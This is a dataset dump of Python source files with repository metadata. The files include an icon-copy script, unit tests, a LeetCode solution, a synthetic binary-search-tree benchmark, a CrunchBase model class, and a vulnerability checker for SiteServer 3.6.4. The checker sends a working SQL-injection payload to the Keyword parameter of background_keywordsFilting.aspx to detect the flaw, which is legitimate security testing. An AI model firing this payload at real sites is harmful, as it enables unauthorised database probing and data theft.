blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bbb837d0aac28477a37baa05d3dd3c36167bc5b7 | 8b59108f621e94935b3b72aae3c441e10cb64a1c | /create_uneeded_icons.py | cdb3dda6906313546c12ebd032e4aa2accfd9755 | []
| no_license | CyberSys/CE_Python | 97a373b1fe2d214ae854d454dc5e7d79bc150d8e | 721ac005e215f1225fb3c99491b55dc48b19ab30 | refs/heads/master | 2022-01-13T08:04:08.558594 | 2019-07-22T17:05:46 | 2019-07-22T17:05:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,542 | py | from shutil import copyfile
import os
if __name__ == "__main__":
uneeded_icons = [
"AssaultScope_48.png",
"ATButtstockTS_48.png",
"ATFrontsightTS_48.png",
"ATHandguardARS_48.png",
"ExtendedClip_48.png",
"FlashlightAcc_48.png",
"Ironsight_48.png",
"NewSilencer_48.png",
"NoAttachmentBarrel_48.png",
"NoAttachmentBottom_48.png",
"Scope12x_48.png",
"ammo_12_gauge_pellet_48.png",
"ammo_12_gauge_slug_48.png",
"ammo_22_48.png",
"ammo_223_48.png",
"ammo_308_48.png",
"ammo_357_48.png",
"ammo_5_56x45_48.png",
"ammo_7_62x51_48.png",
"ammo_9mm_48.png",
"ammo_acp_45_48.png",
"Arrow_0000_48.png",
"Arrow_000P_48.png",
"Arrow_00R0_48.png",
"Arrow_00RP_48.png",
"Arrow_0B00_48.png",
"Arrow_0B0P_48.png",
"Arrow_0BR0_48.png",
"Arrow_0BRP_48.png",
"Arrow_F000_48.png",
"Bolt_0000_48.png",
"Bolt_000P_48.png",
"Bolt_00R0_48.png",
"Bolt_00RP_48.png",
"Bolt_0B00_48.png",
"Bolt_0B0P_48.png",
"Bolt_0BR0_48.png",
"Bolt_0BRP_48.png",
"Bolt_F000_48.png",
"ChemlightBlue_48.png",
"ChemlightGreen_48.png",
"ChemlightRed_48.png",
"ChemlightWhite_48.png",
"ChemlightYellow_48.png",
"Flare_48",
"Flashbang_48.png",
"GrenadeBottle_48.png",
"GrenadeMolotov_48.png",
"GrenadeSmokeGreen_48.png",
"GrenadeSmokeMagenta_48.png",
"GrenadeSmokeRed_48.png",
"GrenadeSmokeWhite_48.png",
"GrenadeSmokeYellow_48.png",
"Pipebomb_48.png",
"animated_search_light_48.png",
"entity_test_48.png",
"entity_test_packed_48.png",
"PlotSign_48.png",
"powered_flood_light_48.png",
"tire_single_48.png",
"DieselGenerator_48.png",
"WaterPurifictionTablets_48.png",
"CampingTentBlue_48.png",
"CampingTentBrown_48.png",
"CampingTentGreen_48.png",
"CampingTentOrange_48.png",
"CampingTentPurple_48.png",
"CampingTentRed_48.png",
"CampingTentYellow_48.png",
"PackedCampingTent_48.png",
"PackedTrekkingTent_48.png",
"PupTentBlue_48.png",
"PupTentBrown_48.png",
"PupTentGreen_48.png",
"PupTentRed_48.png",
"PupTentTan_48.png",
"TrekkingTentBlue_48.png",
"TrekkingTentBrown_48.png",
"TrekkingTentGreen_48.png",
"TrekkingTentOrange_48.png",
"TrekkingTentPurple_48.png",
"TrekkingTentRed_48.png",
"TrekkingTentYellow_48.png",
"TwoPersonTentBlue_48.png",
"TwoPersonTentBrown_48.png",
"TwoPersonTentGreen_48.png",
"TwoPersonTentOrange_48.png",
"TwoPersonTentPurple_48.png",
"TwoPersonTentRed_48.png",
"TwoPersonTentYellow_48.png",
"FlashbangPickup_48.png",
"Binoculars_48.png",
"DebugPistol_48.png",
"NoWeapon_48.png",
"PickAndThrowWeapon_48.png",
]
for x in uneeded_icons:
copyfile(
os.path.normpath(
"D:/perforce/dev/GameSDK/Libs/UI/Inventory/item_images/no_icon_48.png"
),
os.path.join("D:/perforce/dev/GameSDK/Libs/UI/Inventory/item_images", x),
)
| [
"[email protected]"
]
| |
634db64fad5672d244b9dde45ed05c57dca1210d | a1b21aa9b4c3b99b9b16fd47686bcc76e6fafd18 | /unit_test/function_test/test_name_function.py | 9852039917d53af0689e6cada925c25852cced60 | []
| no_license | irfan87/python_tutorial | 986c5dae98a5ad928c3820bf0355f544c091caf0 | 71bbf8b8aba2d5a1fafc56b8cb15d471c428a0cf | refs/heads/master | 2020-06-05T00:52:07.619489 | 2019-08-19T02:56:41 | 2019-08-19T02:56:41 | 192,257,432 | 0 | 0 | null | 2019-08-19T02:56:42 | 2019-06-17T01:53:46 | Python | UTF-8 | Python | false | false | 643 | py | import unittest
from name_function import get_formatted_name
class NamesTestCase(unittest.TestCase):
    """Unit tests for name_function.get_formatted_name()."""

    def test_first_last_name(self):
        """A plain first/last pair is title-cased and joined with a space."""
        result = get_formatted_name('janis', 'joplin')
        self.assertEqual(result, 'Janis Joplin')

    def test_first_last_middle_name(self):
        """An optional middle name is placed between first and last."""
        result = get_formatted_name('wolfgang', 'mozart', 'amadeus')
        self.assertEqual(result, 'Wolfgang Amadeus Mozart')
if __name__ == '__main__':
    # Discover and run the test methods above when executed as a script.
    unittest.main()
| [
"[email protected]"
]
| |
ed7aeccf50b61c1ede46b34c971ecbf6fac49f40 | 90baf1f6abb0dcba147f46105347a7d81f0ed617 | /472-concatenated-words/472-concatenated-words.py | 1541cd05cdd590100ef56d987a207bccb9cf9176 | []
| no_license | vinija/LeetCode | c2bfbd78711b2ebedcfd4f834d12fde56a15b460 | de2727f1cc52ce08a06d63cff77b6ef6bb9d2528 | refs/heads/master | 2022-09-29T06:16:44.465457 | 2022-08-21T05:20:45 | 2022-08-21T05:20:45 | 97,401,204 | 116 | 32 | null | null | null | null | UTF-8 | Python | false | false | 830 | py | # ORIGINAL POST WITH EXPLANATION: https://leetcode.com/problems/concatenated-words/discuss/871866/Easyway-Explanation-every-step
class Solution(object):
    def findAllConcatenatedWordsInADict(self, words):
        """Return the words that can be formed by concatenating two or more
        (not necessarily distinct) other words from the input list.

        Preserves the input order of `words` in the result.

        :type words: List[str]
        :rtype: List[str]
        """
        word_set = set(words)
        # Memoize "can this string be fully split into dictionary words?"
        # across all queries; results depend only on word_set, so the cache
        # is valid globally.  Without it the search is exponential on inputs
        # with many overlapping prefixes.
        memo = {}

        def can_split(word):
            # True iff `word` decomposes into a dictionary-word prefix
            # followed by either a dictionary word or a splittable suffix.
            if word in memo:
                return memo[word]
            for i in range(1, len(word)):
                prefix = word[:i]
                suffix = word[i:]
                if prefix in word_set and (suffix in word_set or can_split(suffix)):
                    memo[word] = True
                    return True
            memo[word] = False
            return False

        return [w for w in words if can_split(w)]
"[email protected]"
]
| |
b1c6ea574c79b9969846989153c8237e1508baf1 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/tree-big-622.py | e0c3373dd20ce956070551e9031ef9fac32135c3 | []
| no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,286 | py | # Binary-search trees
class TreeNode(object):
    """A binary-search-tree node holding an int key."""
    value:int = 0
    left:"TreeNode" = None
    right:"TreeNode" = None
    def insert(self:"TreeNode", x:int) -> bool:
        """Insert x into this subtree; return True iff a node was added."""
        if x == self.value:
            return False
        if x < self.value:
            if self.left is not None:
                return self.left.insert(x)
            self.left = makeNode(x)
            return True
        if self.right is not None:
            return self.right.insert(x)
        self.right = makeNode(x)
        return True
    def contains(self:"TreeNode", x:int) -> bool:
        """Return True iff x occurs in this subtree."""
        if x == self.value:
            return True
        branch = self.left if x < self.value else self.right
        return branch is not None and branch.contains(x)
class TreeNode2(object):
    """BST node variant with duplicated fields.

    Only value/left/right participate in the algorithms; the *2 fields and
    the extra parameters of the *2 methods are ignored, matching the
    original (generated) behavior.
    """
    value:int = 0
    value2:int = 0
    left:"TreeNode2" = None
    left2:"TreeNode2" = None
    right:"TreeNode2" = None
    right2:"TreeNode2" = None
    def insert(self:"TreeNode2", x:int) -> bool:
        """Insert x into this subtree; return True iff a node was added."""
        if x < self.value:
            if self.left is None:
                self.left = makeNode2(x, x)
                return True
            return self.left.insert(x)
        elif x > self.value:
            if self.right is None:
                self.right = makeNode2(x, x)
                return True
            return self.right.insert(x)
        return False
    def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
        """Same as insert(); x2 is ignored.

        Fixed: the original body contained the invalid token `$Member`
        where `self.right` belongs (by symmetry with insert()).
        """
        return self.insert(x)
    def contains(self:"TreeNode2", x:int) -> bool:
        """Return True iff x occurs in this subtree."""
        if x < self.value:
            return self.left is not None and self.left.contains(x)
        elif x > self.value:
            return self.right is not None and self.right.contains(x)
        return True
    def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
        """Same as contains(); x2 is ignored."""
        return self.contains(x)
class TreeNode3(object):
    """BST node with triplicated fields; only value/left/right are used."""
    value:int = 0
    value2:int = 0
    value3:int = 0
    left:"TreeNode3" = None
    left2:"TreeNode3" = None
    left3:"TreeNode3" = None
    right:"TreeNode3" = None
    right2:"TreeNode3" = None
    right3:"TreeNode3" = None
    def insert(self:"TreeNode3", x:int) -> bool:
        """Insert x into this subtree; return True iff a node was added."""
        if x == self.value:
            return False
        if x < self.value:
            if self.left is not None:
                return self.left.insert(x)
            self.left = makeNode3(x, x, x)
            return True
        if self.right is not None:
            return self.right.insert(x)
        self.right = makeNode3(x, x, x)
        return True
    def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        return self.insert(x)
    def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        return self.insert(x)
    def contains(self:"TreeNode3", x:int) -> bool:
        """Return True iff x occurs in this subtree."""
        if x == self.value:
            return True
        branch = self.left if x < self.value else self.right
        return branch is not None and branch.contains(x)
    def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
    def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
class TreeNode4(object):
    """BST node with four copies of each field; only value/left/right are used."""
    value:int = 0
    value2:int = 0
    value3:int = 0
    value4:int = 0
    left:"TreeNode4" = None
    left2:"TreeNode4" = None
    left3:"TreeNode4" = None
    left4:"TreeNode4" = None
    right:"TreeNode4" = None
    right2:"TreeNode4" = None
    right3:"TreeNode4" = None
    right4:"TreeNode4" = None
    def insert(self:"TreeNode4", x:int) -> bool:
        """Insert x into this subtree; return True iff a node was added."""
        if x == self.value:
            return False
        if x < self.value:
            if self.left is not None:
                return self.left.insert(x)
            self.left = makeNode4(x, x, x, x)
            return True
        if self.right is not None:
            return self.right.insert(x)
        self.right = makeNode4(x, x, x, x)
        return True
    def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        return self.insert(x)
    def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        return self.insert(x)
    def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        return self.insert(x)
    def contains(self:"TreeNode4", x:int) -> bool:
        """Return True iff x occurs in this subtree."""
        if x == self.value:
            return True
        branch = self.left if x < self.value else self.right
        return branch is not None and branch.contains(x)
    def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
    def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
    def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
class TreeNode5(object):
    """BST node with five copies of each field; only value/left/right are used."""
    value:int = 0
    value2:int = 0
    value3:int = 0
    value4:int = 0
    value5:int = 0
    left:"TreeNode5" = None
    left2:"TreeNode5" = None
    left3:"TreeNode5" = None
    left4:"TreeNode5" = None
    left5:"TreeNode5" = None
    right:"TreeNode5" = None
    right2:"TreeNode5" = None
    right3:"TreeNode5" = None
    right4:"TreeNode5" = None
    right5:"TreeNode5" = None
    def insert(self:"TreeNode5", x:int) -> bool:
        """Insert x into this subtree; return True iff a node was added."""
        if x == self.value:
            return False
        if x < self.value:
            if self.left is not None:
                return self.left.insert(x)
            self.left = makeNode5(x, x, x, x, x)
            return True
        if self.right is not None:
            return self.right.insert(x)
        self.right = makeNode5(x, x, x, x, x)
        return True
    def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        return self.insert(x)
    def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        return self.insert(x)
    def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        return self.insert(x)
    def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        return self.insert(x)
    def contains(self:"TreeNode5", x:int) -> bool:
        """Return True iff x occurs in this subtree."""
        if x == self.value:
            return True
        branch = self.left if x < self.value else self.right
        return branch is not None and branch.contains(x)
    def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
    def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
    def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
    def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
class Tree(object):
    """A binary search tree that tracks how many distinct keys it holds."""
    root:TreeNode = None
    size:int = 0
    def insert(self:"Tree", x:int) -> object:
        """Insert x, creating the root on first use; bump size on growth."""
        if self.root is None:
            self.root = makeNode(x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def contains(self:"Tree", x:int) -> bool:
        """Return True iff x has been inserted."""
        return self.root is not None and self.root.contains(x)
class Tree2(object):
    """BST wrapper (duplicated-field variant); only root/size participate."""
    root:TreeNode2 = None
    root2:TreeNode2 = None
    size:int = 0
    size2:int = 0
    def insert(self:"Tree2", x:int) -> object:
        """Insert x, creating the root on first use; bump size on growth."""
        if self.root is None:
            self.root = makeNode2(x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def insert2(self:"Tree2", x:int, x2:int) -> object:
        """Behaviorally identical to insert(); x2 is ignored."""
        self.insert(x)
    def contains(self:"Tree2", x:int) -> bool:
        """Return True iff x has been inserted."""
        return self.root is not None and self.root.contains(x)
    def contains2(self:"Tree2", x:int, x2:int) -> bool:
        """Behaviorally identical to contains(); x2 is ignored."""
        return self.contains(x)
class Tree3(object):
    """BST wrapper (triplicated-field variant); only root/size participate."""
    root:TreeNode3 = None
    root2:TreeNode3 = None
    root3:TreeNode3 = None
    size:int = 0
    size2:int = 0
    size3:int = 0
    def insert(self:"Tree3", x:int) -> object:
        """Insert x, creating the root on first use; bump size on growth."""
        if self.root is None:
            self.root = makeNode3(x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def insert2(self:"Tree3", x:int, x2:int) -> object:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        self.insert(x)
    def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        self.insert(x)
    def contains(self:"Tree3", x:int) -> bool:
        """Return True iff x has been inserted."""
        return self.root is not None and self.root.contains(x)
    def contains2(self:"Tree3", x:int, x2:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
    def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
class Tree4(object):
    """BST wrapper (quadruplicated-field variant); only root/size participate."""
    root:TreeNode4 = None
    root2:TreeNode4 = None
    root3:TreeNode4 = None
    root4:TreeNode4 = None
    size:int = 0
    size2:int = 0
    size3:int = 0
    size4:int = 0
    def insert(self:"Tree4", x:int) -> object:
        """Insert x, creating the root on first use; bump size on growth."""
        if self.root is None:
            self.root = makeNode4(x, x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def insert2(self:"Tree4", x:int, x2:int) -> object:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        self.insert(x)
    def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        self.insert(x)
    def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        self.insert(x)
    def contains(self:"Tree4", x:int) -> bool:
        """Return True iff x has been inserted."""
        return self.root is not None and self.root.contains(x)
    def contains2(self:"Tree4", x:int, x2:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
    def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
    def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
class Tree5(object):
    """BST wrapper (quintuplicated-field variant); only root/size participate."""
    root:TreeNode5 = None
    root2:TreeNode5 = None
    root3:TreeNode5 = None
    root4:TreeNode5 = None
    root5:TreeNode5 = None
    size:int = 0
    size2:int = 0
    size3:int = 0
    size4:int = 0
    size5:int = 0
    def insert(self:"Tree5", x:int) -> object:
        """Insert x, creating the root on first use; bump size on growth."""
        if self.root is None:
            self.root = makeNode5(x, x, x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def insert2(self:"Tree5", x:int, x2:int) -> object:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        self.insert(x)
    def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        self.insert(x)
    def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        self.insert(x)
    def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
        """Behaviorally identical to insert(); extra arguments are ignored."""
        self.insert(x)
    def contains(self:"Tree5", x:int) -> bool:
        """Return True iff x has been inserted."""
        return self.root is not None and self.root.contains(x)
    def contains2(self:"Tree5", x:int, x2:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
    def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
    def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
    def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
        """Behaviorally identical to contains(); extra arguments are ignored."""
        return self.contains(x)
def makeNode(x: int) -> TreeNode:
    """Return a new leaf TreeNode holding x."""
    node = TreeNode()
    node.value = x
    return node
def makeNode2(x: int, x2: int) -> TreeNode2:
    """Return a new leaf TreeNode2 holding x.

    x2 is accepted for signature parity with the other factories but is
    unused, matching the original behavior (value2 keeps its class default).
    Removed the original's unused pre-declared local (b2).
    """
    b = TreeNode2()
    b.value = x
    return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
    """Return a new leaf TreeNode3 holding x.

    x2/x3 are accepted for signature parity but unused, matching the
    original behavior.  Removed the original's unused locals (b2, b3).
    """
    b = TreeNode3()
    b.value = x
    return b
def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4:
    """Return a new leaf TreeNode4 holding x.

    x2..x4 are accepted for signature parity but unused, matching the
    original behavior.  Removed the original's unused locals (b2..b4).
    """
    b = TreeNode4()
    b.value = x
    return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
    """Return a new leaf TreeNode5 holding x.

    x2..x5 are accepted for signature parity but unused, matching the
    original behavior.  Removed the original's unused locals (b2..b5).
    """
    b = TreeNode5()
    b.value = x
    return b
# Input parameters
# Only n (iteration count) and c (skip modulus) drive the run below;
# the *2..*5 clones are assigned but never read (generated code).
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
# t is the tree under test, i the loop counter, and k a pseudo-random key
# stream produced by a multiplicative congruential generator (mod 37831).
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
# Insert n pseudo-random keys (plus most loop indices), print the number
# of distinct keys, then probe a fixed set of values and print those found.
t = Tree()
while i < n:
    t.insert(k)
    # Advance the key stream: k <- (k * 37813) mod 37831.
    k = (k * 37813) % 37831
    if i % c != 0:
        t.insert(i)
    i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
    if t.contains(i):
        print(i)
| [
"[email protected]"
]
| |
f170105dd4df1fcc7753415af3c4715d042cf732 | 9c38f3a354844f5080632005630d249d6487ebb3 | /python_compiler/lexer/submitted/test.512.py | ba4d1189a78cf314b7ee04b45c551fcd673df06e | []
| no_license | keithroe/keithscode | ee7247ad6bdd844279f29a56718992cb886f9215 | 470c6b833b9b8bc2c78d1b43aac896b0ce9c9a7c | refs/heads/master | 2021-01-10T08:48:12.729594 | 2018-10-16T17:48:31 | 2018-10-16T17:48:31 | 51,531,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12 | py | r = 5 \
+ 4 | [
"keithroe@cba41313-dcc7-113d-0d3d-2a2d30939b49"
]
| keithroe@cba41313-dcc7-113d-0d3d-2a2d30939b49 |
09350b78ae65b299217cbd7c1567d5543b66ea37 | 37a119f116431ef91f1257370a5cd4a992b018db | /tests/sql/test_expressions.py | 123319ebd94792d6d470655ae8be31eb2e22416f | [
"ISC"
]
| permissive | uranusjr/sqlian | 660e66d4c5c01b1112961f4097e95143c15cf72a | 8f029e91af032e23ebb95cb599aa7267ebe75e05 | refs/heads/master | 2021-01-19T18:59:19.349318 | 2017-09-12T13:12:10 | 2017-09-12T13:12:10 | 101,176,270 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 903 | py | from sqlian import Sql
from sqlian.standard import expressions as e
def test_identifier(engine):
    """A bare identifier renders as a double-quoted name."""
    ident = e.Identifier('foo')
    rendered = ident.__sql__(engine)
    assert rendered == Sql('"foo"'), ident
def test_identifier_qualified(engine):
    """A qualified identifier joins its parts with a dot, each quoted."""
    ident = e.Identifier('foo', 'bar')
    rendered = ident.__sql__(engine)
    assert rendered == Sql('"foo"."bar"'), ident
def test_is_null(engine):
    """Comparing an identifier to None renders as IS NULL."""
    expr = e.Equal(e.Identifier('foo'), None)
    rendered = expr.__sql__(engine)
    assert rendered == Sql('"foo" IS NULL'), expr
def test_is_not_null(engine):
    """Negated comparison to None renders as IS NOT NULL."""
    expr = e.NotEqual(e.Identifier('foo'), None)
    rendered = expr.__sql__(engine)
    assert rendered == Sql('"foo" IS NOT NULL'), expr
def test_equal(engine):
    """Equality against a number renders with = and an unquoted literal."""
    expr = e.Equal(e.Identifier('foo', 'bar'), 42)
    rendered = expr.__sql__(engine)
    assert rendered == Sql('"foo"."bar" = 42'), expr
def test_not_equal(engine):
    """Inequality against a string renders with != and a quoted literal."""
    expr = e.NotEqual(e.Identifier('person', 'name'), 'Mosky')
    rendered = expr.__sql__(engine)
    assert rendered == Sql('"person"."name" != ' + "'Mosky'"), expr
| [
"[email protected]"
]
| |
dd773633d85d0d1d73c0a0a758c4bdebd3107be2 | 6f7ba68d9e2ba6cfc7f07367bcd34a643f863044 | /cms/siteserver/siteserver_background_keywordsFilting_sqli.py | 24feed6f2a0c31d35687f1091c3bcc6d3214f82b | []
| no_license | deepwebhacker/Dxscan | 2e803ee01005a1d0a7802290bfb553f99e8fcf2e | eace0872e1deb66d53ec7cfc62f4c793f9421901 | refs/heads/main | 2023-03-06T10:26:23.371926 | 2021-02-22T14:03:51 | 2021-02-22T14:03:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,719 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: siteserver3.6.4 background_keywordsFilting.aspx注入
referer: http://www.wooyun.org/bugs/wooyun-2013-043641
author: Lucifer
description: 文件/siteserver/bbs/background_keywordsFilting.aspx中,参数Keyword存在SQL注入。
'''
import sys
import requests
import warnings
from termcolor import cprint
class siteserver_background_keywordsFilting_sqli_BaseVerify:
    """Probe for the siteserver 3.6.4 SQL-injection in
    /bbs/background_keywordsFilting.aspx (Keyword parameter).

    The probe sends a boolean-based payload that concatenates CHAR(66)x3
    ("BBB") with @@VERSION; seeing "BBBMicrosoft" in the response indicates
    the injected expression was evaluated by SQL Server.
    """
    def __init__(self, url):
        # Base URL of the target site (scheme + host), no trailing path.
        self.url = url
    def run(self):
        """Send the probe request and report the result via cprint.

        Side effects: on a positive result, POSTs a report to a local
        collector at http://localhost:8848/cms.
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # URL-encoded boolean SQLi payload; mixed case defeats naive filters.
        payload = "/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test%27AnD%20ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIoN>0--"
        vulnurl = self.url + payload
        try:
            # verify=False: targets often have invalid TLS certificates.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"BBBMicrosoft" in req.text:
                cprint("[+]存在siteserver3.6.4 background_keywordsFilting.aspx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
                postdata = {self.url:"存在siteserver3.6.4 background_keywordsFilting.aspx注入漏洞...(高危)\tpayload: "+vulnurl}
                requests.post('http://localhost:8848/cms', json=postdata)
            else:
                cprint("[-]不存在siteserver_background_keywordsFilting_sqli漏洞", "white", "on_grey")
        # NOTE(review): bare except swallows all errors (incl. KeyboardInterrupt);
        # narrowing to requests.RequestException would be safer.
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = siteserver_background_keywordsFilting_sqli_BaseVerify(sys.argv[1])
testVuln.run()
| [
"[email protected]"
]
| |
98a9f68c969ed0299834aeafe3f5422274954ce7 | 8a3401fcc24fb398e7cac0f8a67e132ed5b3fa8f | /src/pycrunchbase/resource/news.py | 67242ca520fe227c4dc5b1285fa4919f577e6495 | [
"MIT"
]
| permissive | ngzhian/pycrunchbase | 58cf96ed20b5b3f4861bb884bcf0d9ffcf4df808 | ead7c93a51907141d687da02864a3803d1876499 | refs/heads/master | 2023-07-08T06:18:59.314695 | 2023-07-03T13:27:06 | 2023-07-03T13:27:06 | 30,629,033 | 69 | 45 | MIT | 2020-12-02T02:26:40 | 2015-02-11T03:39:14 | Python | UTF-8 | Python | false | false | 734 | py | import six
from .node import Node
from .utils import parse_date
@six.python_2_unicode_compatible
class News(Node):
    """A News item on CrunchBase."""
    KNOWN_PROPERTIES = [
        "title",
        "author",
        "posted_on",
        "url",
        "created_at",
        "updated_at",
    ]

    def _coerce_values(self):
        """Convert the raw 'posted_on' value into a date when present."""
        raw = getattr(self, 'posted_on', None)
        if raw:
            self.posted_on = parse_date(raw)

    def __str__(self):
        parts = dict(
            title=self.title,
            author=self.author,
            posted_on=self.posted_on,
        )
        return u'{title} by {author} on {posted_on}'.format(**parts)

    def __repr__(self):
        return self.__str__()
| [
"[email protected]"
]
| |
